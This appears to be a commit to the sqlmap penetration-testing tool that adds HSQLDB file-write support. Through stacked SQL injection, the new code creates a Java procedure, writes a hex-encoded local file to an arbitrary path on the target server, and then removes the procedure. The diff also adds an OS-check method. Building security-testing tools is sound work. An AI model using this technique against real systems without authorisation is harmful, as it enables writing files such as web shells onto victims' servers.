HSQLDB write file support (#4379)

* Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local>
2024-11-22 01:26:42 +03:00 · 2020-10-13 16:56:39 +08:00 · 2020-10-13 16:56:39 +08:00 · babe52eb10
commit babe52eb10
parent 231c3da057
2 changed files with 58 additions and 3 deletions
--- a/plugins/dbms/hsqldb/filesystem.py
+++ b/plugins/dbms/hsqldb/filesystem.py
@ -5,6 +5,12 @@ Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

+from lib.core.common import randomStr
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.decorators import stackedmethod
+from lib.core.enums import PLACE
+from lib.request import inject
 from lib.core.exception import SqlmapUnsupportedFeatureException
 from plugins.generic.filesystem import Filesystem as GenericFilesystem

@ -13,6 +19,45 @@ class Filesystem(GenericFilesystem):
        errMsg = "on HSQLDB it is not possible to read files"
        raise SqlmapUnsupportedFeatureException(errMsg)

-    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
-        errMsg = "on HSQLDB it is not possible to write files"
-        raise SqlmapUnsupportedFeatureException(errMsg)
+    @stackedmethod
+    def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
+
+        funcName = randomStr()
+        MAX_BYTES = 2 ** 20
+
+        debugMsg = "creating a Java Language Procedure '%s'" % funcName
+        logger.debug(debugMsg)
+
+        addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, MAX_BYTES)
+        addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
+        addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
+        inject.goStacked(addFuncQuery)
+
+        logger.debug("encoding file to its hexadecimal string value")
+
+        fcEncodedList = self.fileEncode(localFile, "hex", True)
+        fcEncodedStr = fcEncodedList[0][2:]
+        fcEncodedStrLen = len(fcEncodedStr)
+
+        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
+            warnMsg = "the injection is on a GET parameter and the file "
+            warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
+            warnMsg += "bytes, this might cause errors in the file "
+            warnMsg += "writing process"
+            logger.warn(warnMsg)
+
+        debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
+        logger.debug(debugMsg)
+
+        # http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
+        invokeQuery = "call %s('%s', cast ('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, MAX_BYTES)
+        inject.goStacked(invokeQuery)
+
+        logger.debug("removing procedure %s from DB" % funcName)
+        delQuery = "DELETE PROCEDURE " + funcName
+        inject.goStacked(delQuery)
+
+        message = "the local file '%s' has been successfully written on the back-end DBMS" % localFile
+        message += "file system ('%s')" % remoteFile
+        logger.info(message)
+
--- a/plugins/dbms/hsqldb/fingerprint.py
+++ b/plugins/dbms/hsqldb/fingerprint.py
@ -144,3 +144,13 @@ class Fingerprint(GenericFingerprint):
    def getHostname(self):
        warnMsg = "on HSQLDB it is not possible to enumerate the hostname"
        logger.warn(warnMsg)
+
+
+    def checkDbmsOs(self, detailed=False):
+        if Backend.getOs():
+            infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
+            logger.info(infoMsg)
+        else:
+            self.userChooseDbmsOs()
+
+